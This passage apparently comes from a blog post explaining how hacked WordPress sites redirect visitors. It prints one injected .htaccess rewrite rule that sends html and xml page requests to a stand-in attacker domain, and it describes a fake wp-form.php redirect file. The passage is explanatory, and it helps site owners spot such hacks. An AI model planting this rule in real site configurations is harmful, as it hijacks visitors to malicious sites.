This code is slightly more clever and only redirects htmlHTMLHTML is an acronym for Hyper Text Markup Language. It is a markup language that is used in the development of web pages and websites. or xml pages. This is clever because it’s not something you’d actually notice unless you went to a html file (something WP sites rarely do).
RewriteRule ([^.]+\.(html|xml|))$ http://EVILHACKERSITE.COM [L,R]
This one checks where you came from and if it was a search engine, redirects you.
Where this one gets super sneaky is that it made a file called wp-form.php, which looks like but is not a real WordPress file. In that file was a series of checks and redirects which sent the visitor to another website. Where this particular hack failed is that the wp-admin pages usually end in .php, so the site admin noticed that he was being redirected when he tried to go to, say, example.com/wp-admin/plugins.php – Ooops.